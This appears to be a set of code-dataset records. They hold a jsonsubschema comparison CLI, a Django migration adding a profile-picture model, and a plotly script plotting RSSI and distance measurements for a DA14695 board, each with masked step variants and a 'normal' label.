''' Created on June 24, 2019 @author: Andrew Habib ''' import json import jsonref import sys from jsonsubschema.api import isSubschema def main(): assert len( sys.argv) == 3, "jsonsubschema cli takes exactly two arguments lhs_schema and rhs_schema" s1_file = sys.argv[1] s2_file = sys.argv[2] with open(s1_file, 'r') as f1: s1 = json.load(f1) # s1 = jsonref.load(f1) with open(s2_file, 'r') as f2: s2 = json.load(f2) # s2 = jsonref.load(f2) print("LHS <: RHS", isSubschema(s1, s2)) print("RHS <: LHS", isSubschema(s2, s1)) if __name__ == "__main__": main()
normal
{ "blob_id": "ba78a1e29736c4f109a0efc6f5b9993994661058", "index": 3527, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef main():\n assert len(sys.argv\n ) == 3, 'jsonsubschema cli takes exactly two arguments lhs_schema and rhs_schema'\n s1_file = sys.argv[1]\n s2_file = sys.argv[2]\n with open(s1_file, 'r') as f1:\n s1 = json.load(f1)\n with open(s2_file, 'r') as f2:\n s2 = json.load(f2)\n print('LHS <: RHS', isSubschema(s1, s2))\n print('RHS <: LHS', isSubschema(s2, s1))\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef main():\n assert len(sys.argv\n ) == 3, 'jsonsubschema cli takes exactly two arguments lhs_schema and rhs_schema'\n s1_file = sys.argv[1]\n s2_file = sys.argv[2]\n with open(s1_file, 'r') as f1:\n s1 = json.load(f1)\n with open(s2_file, 'r') as f2:\n s2 = json.load(f2)\n print('LHS <: RHS', isSubschema(s1, s2))\n print('RHS <: LHS', isSubschema(s2, s1))\n\n\nif __name__ == '__main__':\n main()\n", "step-4": "<mask token>\nimport json\nimport jsonref\nimport sys\nfrom jsonsubschema.api import isSubschema\n\n\ndef main():\n assert len(sys.argv\n ) == 3, 'jsonsubschema cli takes exactly two arguments lhs_schema and rhs_schema'\n s1_file = sys.argv[1]\n s2_file = sys.argv[2]\n with open(s1_file, 'r') as f1:\n s1 = json.load(f1)\n with open(s2_file, 'r') as f2:\n s2 = json.load(f2)\n print('LHS <: RHS', isSubschema(s1, s2))\n print('RHS <: LHS', isSubschema(s2, s1))\n\n\nif __name__ == '__main__':\n main()\n", "step-5": "'''\nCreated on June 24, 2019\n@author: Andrew Habib\n'''\n\nimport json\nimport jsonref\nimport sys\n\nfrom jsonsubschema.api import isSubschema\n\n\ndef main():\n\n assert len(\n sys.argv) == 3, \"jsonsubschema cli takes exactly two arguments lhs_schema and rhs_schema\"\n\n s1_file = sys.argv[1]\n s2_file = sys.argv[2]\n\n with open(s1_file, 'r') as f1:\n s1 = json.load(f1)\n # s1 = jsonref.load(f1)\n with open(s2_file, 'r') as f2:\n s2 = json.load(f2)\n # s2 = jsonref.load(f2)\n\n print(\"LHS <: RHS\", isSubschema(s1, s2))\n print(\"RHS <: LHS\", isSubschema(s2, s1))\n\n\nif __name__ == \"__main__\":\n\n main()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# Generated by Django 3.1.2 on 2021-02-13 14:40 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('post', '0014_profilepic_user'), ] operations = [ migrations.CreateModel( name='profile_pic', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('user', models.CharField(max_length=100)), ('pic', models.ImageField(blank=True, null=True, upload_to='profilepicture/')), ], ), ]
normal
{ "blob_id": "bf05a096956ca4f256832e2fc6659d42c5611796", "index": 6712, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('post', '0014_profilepic_user')]\n operations = [migrations.CreateModel(name='profile_pic', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('user', models.CharField(max_length=\n 100)), ('pic', models.ImageField(blank=True, null=True, upload_to=\n 'profilepicture/'))])]\n", "step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('post', '0014_profilepic_user')]\n operations = [migrations.CreateModel(name='profile_pic', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('user', models.CharField(max_length=\n 100)), ('pic', models.ImageField(blank=True, null=True, upload_to=\n 'profilepicture/'))])]\n", "step-5": "# Generated by Django 3.1.2 on 2021-02-13 14:40\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('post', '0014_profilepic_user'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='profile_pic',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('user', models.CharField(max_length=100)),\n ('pic', models.ImageField(blank=True, null=True, upload_to='profilepicture/')),\n ],\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#%% # -*- coding: utf-8 -*- import numpy as np import plotly from plotly.subplots import make_subplots import plotly.graph_objects as go import pandas as pd import os output_directory = r'C:/Users/jgamm/Desktop/rssi_measurement/2020-06-10/figures' antennas = ['original_whip'] folder = r'C:/Users/jgamm/Desktop/rssi_measurement/2020-06-10/data' ri_filenames = [] for i_angle in np.arange(0, 360, 45): ri_filenames.append('r%di%d.csv'%(i_angle, i_angle)) ri_filenames.append('r%di%d.csv'%(i_angle+45, i_angle)) ri_filenames.append('r360i360.csv') angle_filenames = ['%d.csv'%(n) for n in np.arange(0, 405, 45)] distance_filenames = ['%1.2f.csv'%(n) for n in np.arange(.75, 3.25, .25)] ref_line = dict(color='white', width=1) # Plot yaw data for antenna in antennas: fig = make_subplots(rows=2, cols=1, subplot_titles=['Initiator RSSI vs. yaw', 'Calculated distance vs. yaw'], shared_xaxes=True) rssi_hist2d = [] dist_hist2d = [] experiment = 'orientation_exp1' dist_lim = [100, 0] db_lim = [-100, 0] for filename in ri_filenames: data = pd.read_csv(os.path.join(folder, antenna, experiment, filename)) Dist = np.around(data['distance'], 1) for rssi in data['i_rssi']: if rssi-5 < db_lim[1]: db_lim[1] = rssi-5 if rssi+5 > db_lim[0]: db_lim[0] = rssi+5 for dist in Dist: if dist-.5 < dist_lim[0]: dist_lim[0] = dist-.5 if dist+.5 > dist_lim[1]: dist_lim[1] = dist+.5 dist_lim[0] = np.max([0, dist_lim[0]]) column = np.zeros(200) hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T for row in hist: row_idx = -int(row[0]) column[row_idx] = row[1]/len(data['i_rssi']) rssi_hist2d.append(column) column = np.zeros(100) hist = np.array(np.unique(Dist, return_counts=True)).T for row in hist: row_idx = int(np.around(row[0]/.1)) column[row_idx] = row[1]/len(Dist) dist_hist2d.append(column) rssi_hist2d = np.array(rssi_hist2d).T dist_hist2d = np.array(dist_hist2d).T maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)]) fig.add_trace(go.Heatmap( x=np.arange(0, 765, 45), y=np.arange(db_lim[0], db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=1) fig.add_trace(go.Heatmap( x=np.arange(0, 765, 45), y=np.arange(dist_lim[0], dist_lim[1], .1), z=dist_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :], zmin=0, zmax=maxz), row=2, col=1) fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1]*16), mode='lines', line=ref_line), row=2, col=1) fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna'%(antenna), 'xanchor': 'center', 'yanchor': 'top', 'y': .95, 'x': .5}) fig.update_xaxes(title='Angle (°)', row=2, col=1) fig.update_layout(showlegend=False) fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1) fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1) fig.write_image(os.path.join(output_directory, 'orientation_exp1_%s.png'%(antenna))) # Plot pitch data for antenna in antennas: fig = make_subplots(rows=2, cols=1, subplot_titles=['Initiator RSSI vs. pitch', 'Calculated distance vs. pitch'], shared_xaxes=True) rssi_hist2d = [] dist_hist2d = [] experiment = 'orientation_exp2' dist_lim = [100, 0] db_lim = [-100, 0] for filename in ri_filenames: data = pd.read_csv(os.path.join(folder, antenna, experiment, filename)) Dist = np.around(data['distance'], 1) for rssi in data['i_rssi']: if rssi-5 < db_lim[1]: db_lim[1] = rssi-5 if rssi+5 > db_lim[0]: db_lim[0] = rssi+5 for dist in Dist: if dist-.5 < dist_lim[0]: dist_lim[0] = dist-.5 if dist+.5 > dist_lim[1]: dist_lim[1] = dist+.5 dist_lim[0] = np.max([0, dist_lim[0]]) column = np.zeros(200) hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T for row in hist: row_idx = -int(row[0]) column[row_idx] = row[1]/len(data['i_rssi']) rssi_hist2d.append(column) column = np.zeros(100) hist = np.array(np.unique(Dist, return_counts=True)).T for row in hist: row_idx = int(np.around(row[0]/.1)) column[row_idx] = row[1]/len(Dist) dist_hist2d.append(column) rssi_hist2d = np.array(rssi_hist2d).T dist_hist2d = np.array(dist_hist2d).T maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)]) fig.add_trace(go.Heatmap( x=np.arange(0, 765, 45), y=np.arange(db_lim[0], db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=1) fig.add_trace(go.Heatmap( x=np.arange(0, 765, 45), y=np.arange(dist_lim[0], dist_lim[1], .1), z=dist_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :], zmin=0, zmax=maxz), row=2, col=1) fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1]*16), mode='lines', line=ref_line), row=2, col=1) fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna'%(antenna), 'xanchor': 'center', 'yanchor': 'top', 'y': .95, 'x': .5}) fig.update_xaxes(title='Angle (°)', row=2, col=1) fig.update_layout(showlegend=False) fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1) fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1) fig.write_image(os.path.join(output_directory, 'orientation_exp2_%s.png'%(antenna))) # Plot roll data for antenna in antennas: fig = make_subplots(rows=2, cols=1, subplot_titles=['Initiator RSSI vs. roll', 'Calculated distance vs. roll'], shared_xaxes=True) rssi_hist2d = [] dist_hist2d = [] experiment = 'orientation_exp3' dist_lim = [100, 0] db_lim = [-100, 0] for filename in ri_filenames: data = pd.read_csv(os.path.join(folder, antenna, experiment, filename)) Dist = np.around(data['distance'], 1) for rssi in data['i_rssi']: if rssi-5 < db_lim[1]: db_lim[1] = rssi-5 if rssi+5 > db_lim[0]: db_lim[0] = rssi+5 for dist in Dist: if dist-.5 < dist_lim[0]: dist_lim[0] = dist-.5 if dist+.5 > dist_lim[1]: dist_lim[1] = dist+.5 dist_lim[0] = np.max([0, dist_lim[0]]) column = np.zeros(200) hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T for row in hist: row_idx = -int(row[0]) column[row_idx] = row[1]/len(data['i_rssi']) rssi_hist2d.append(column) column = np.zeros(100) hist = np.array(np.unique(Dist, return_counts=True)).T for row in hist: row_idx = int(np.around(row[0]/.1)) column[row_idx] = row[1]/len(Dist) dist_hist2d.append(column) rssi_hist2d = np.array(rssi_hist2d).T dist_hist2d = np.array(dist_hist2d).T maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)]) fig.add_trace(go.Heatmap( x=np.arange(0, 765, 45), y=np.arange(db_lim[0], db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=1) fig.add_trace(go.Heatmap( x=np.arange(0, 765, 45), y=np.arange(dist_lim[0], dist_lim[1], .1), z=dist_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :], zmin=0, zmax=maxz), row=2, col=1) fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1]*16), mode='lines', line=ref_line), row=2, col=1) fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna'%(antenna), 'xanchor': 'center', 'yanchor': 'top', 'y': .95, 'x': .5}) fig.update_xaxes(title='Angle (°)', row=2, col=1) fig.update_layout(showlegend=False) fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1) fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1) fig.write_image(os.path.join(output_directory, 'orientation_exp3_%s.png'%(antenna))) # Plot position data for antenna in antennas: fig = make_subplots(rows=2, cols=1, subplot_titles=['Initiator RSSI vs. position', 'Calculated distance vs. position'], shared_xaxes=True) rssi_hist2d = [] dist_hist2d = [] experiment = 'orientation_exp4' dist_lim = [100, 0] db_lim = [-100, 0] for filename in angle_filenames: data = pd.read_csv(os.path.join(folder, antenna, experiment, filename)) Dist = np.around(data['distance'], 1) for rssi in data['i_rssi']: if rssi-5 < db_lim[1]: db_lim[1] = rssi-5 if rssi+5 > db_lim[0]: db_lim[0] = rssi+5 for dist in Dist: if dist-.5 < dist_lim[0]: dist_lim[0] = dist-.5 if dist+.5 > dist_lim[1]: dist_lim[1] = dist+.5 dist_lim[0] = np.max([0, dist_lim[0]]) column = np.zeros(200) hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T for row in hist: row_idx = -int(row[0]) column[row_idx] = row[1]/len(data['i_rssi']) rssi_hist2d.append(column) column = np.zeros(100) hist = np.array(np.unique(Dist, return_counts=True)).T for row in hist: row_idx = int(np.around(row[0]/.1)) column[row_idx] = row[1]/len(Dist) dist_hist2d.append(column) rssi_hist2d = np.array(rssi_hist2d).T dist_hist2d = np.array(dist_hist2d).T maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)]) fig.add_trace(go.Heatmap( x=np.arange(0, 360, 45), y=np.arange(db_lim[0], db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=1) fig.add_trace(go.Heatmap( x=np.arange(0, 360, 45), y=np.arange(dist_lim[0], dist_lim[1], .1), z=dist_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :], zmin=0, zmax=maxz), row=2, col=1) fig.add_trace(go.Scatter(x=np.arange(0, 360, 45), y=np.array([1]*16), mode='lines', line=ref_line), row=2, col=1) fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna'%(antenna), 'xanchor': 'center', 'yanchor': 'top', 'y': .95, 'x': .5}) fig.update_xaxes(title='Angle (°)', row=2, col=1) fig.update_layout(showlegend=False) fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1) fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1) fig.write_image(os.path.join(output_directory, 'orientation_exp4_%s.png'%(antenna))) # Plot separation data for antenna in antennas: fig = make_subplots(rows=2, cols=2, subplot_titles=['Line of sight', 'Blocked'], shared_xaxes=True) rssi_los_hist2d = [] dist_los_hist2d = [] experiment = 'distance_los' dist_lim = [100, 0] db_lim = [-100, 0] for filename in distance_filenames: data = pd.read_csv(os.path.join(folder, antenna, experiment, filename)) Dist = np.around(data['distance'], 1) for rssi in data['i_rssi']: if rssi-5 < db_lim[1]: db_lim[1] = rssi-5 if rssi+5 > db_lim[0]: db_lim[0] = rssi+5 for dist in Dist: if dist-.5 < dist_lim[0]: dist_lim[0] = dist-.5 if dist+.5 > dist_lim[1]: dist_lim[1] = dist+.5 dist_lim[0] = np.max([0, dist_lim[0]]) column = np.zeros(200) hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T for row in hist: row_idx = -int(row[0]) column[row_idx] = row[1]/len(data['i_rssi']) rssi_los_hist2d.append(column) column = np.zeros(100) hist = np.array(np.unique(Dist, return_counts=True)).T for row in hist: row_idx = int(np.around(row[0]/.1)) column[row_idx] = row[1]/len(Dist) dist_los_hist2d.append(column) rssi_los_hist2d = np.array(rssi_los_hist2d).T dist_los_hist2d = np.array(dist_los_hist2d).T rssi_blocked_hist2d = [] dist_blocked_hist2d = [] experiment = 'distance_blocked' for filename in distance_filenames: data = pd.read_csv(os.path.join(folder, antenna, experiment, filename)) Dist = np.around(data['distance'], 1) for rssi in data['i_rssi']: if rssi-5 < db_lim[1]: db_lim[1] = rssi-5 if rssi+5 > db_lim[0]: db_lim[0] = rssi+5 for dist in Dist: if dist-.5 < dist_lim[0]: dist_lim[0] = dist-.5 if dist+.5 > dist_lim[1]: dist_lim[1] = dist+.5 dist_lim[0] = np.max([0, dist_lim[0]]) column = np.zeros(200) hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T for row in hist: row_idx = -int(row[0]) column[row_idx] = row[1]/len(data['i_rssi']) rssi_blocked_hist2d.append(column) column = np.zeros(1000) hist = np.array(np.unique(Dist, return_counts=True)).T for row in hist: row_idx = int(np.around(row[0]/.1)) column[row_idx] = row[1]/len(Dist) dist_blocked_hist2d.append(column) rssi_blocked_hist2d = np.array(rssi_blocked_hist2d).T dist_blocked_hist2d = np.array(dist_blocked_hist2d).T maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)]) fig.add_trace(go.Heatmap( x=np.arange(.75, 3.25, .25), y=np.arange(db_lim[0], db_lim[1], -1), z=rssi_los_hist2d[int(-db_lim[0]):int(-db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=1) fig.add_trace(go.Heatmap( x=np.arange(.75, 3.25, .25), y=np.arange(dist_lim[0], dist_lim[1], .1), z=dist_los_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :], zmin=0, zmax=maxz), row=2, col=1) fig.add_trace(go.Heatmap( x=np.arange(.75, 3.25, .25), y=np.arange(db_lim[0], db_lim[1], -1), z=rssi_blocked_hist2d[int(-db_lim[0]):int(-db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=2) fig.add_trace(go.Heatmap( x=np.arange(.75, 3.25, .25), y=np.arange(dist_lim[0], dist_lim[1], .1), z=dist_blocked_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :], zmin=0, zmax=maxz), row=2, col=2) fig.add_trace(go.Scatter(x=np.arange(.75, 3.25, .25), y=np.arange(.75, 3.25, .25), mode='lines', line=ref_line), row=2, col=1) fig.add_trace(go.Scatter(x=np.arange(.75, 3.25, .25), y=np.arange(.75, 3.25, .25), mode='lines', line=ref_line), row=2, col=2) fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna'%(antenna), 'xanchor': 'center', 'yanchor': 'top', 'y': .95, 'x': .5}) fig.update_xaxes(title='Separation (m)', row=2, col=1) fig.update_xaxes(title='Separation (m)', row=2, col=2) fig.update_layout(showlegend=False) fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1) fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1) fig.write_image(os.path.join(output_directory, 'distance_%s.png'%(antenna)))
normal
{ "blob_id": "3d3b9956a98f11a170d66280abe7f193cef9ccfb", "index": 808, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i_angle in np.arange(0, 360, 45):\n ri_filenames.append('r%di%d.csv' % (i_angle, i_angle))\n ri_filenames.append('r%di%d.csv' % (i_angle + 45, i_angle))\nri_filenames.append('r360i360.csv')\n<mask token>\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. yaw', 'Calculated distance vs. yaw'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp1'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp1_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. pitch', 'Calculated distance vs. pitch'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp2'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp2_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. roll', 'Calculated distance vs. roll'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp3'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 765, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp3_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1, subplot_titles=[\n 'Initiator RSSI vs. position', 'Calculated distance vs. position'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp4'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in angle_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0, 360, 45), y=np.arange(db_lim[0],\n db_lim[1], -1), z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0, 360, 45), y=np.arange(dist_lim[\n 0], dist_lim[1], 0.1), z=dist_hist2d[int(dist_lim[0] / 0.1):int(\n dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 360, 45), y=np.array([1] * 16),\n mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp4_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=2, subplot_titles=['Line of sight',\n 'Blocked'], shared_xaxes=True)\n rssi_los_hist2d = []\n dist_los_hist2d = []\n experiment = 'distance_los'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in distance_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi 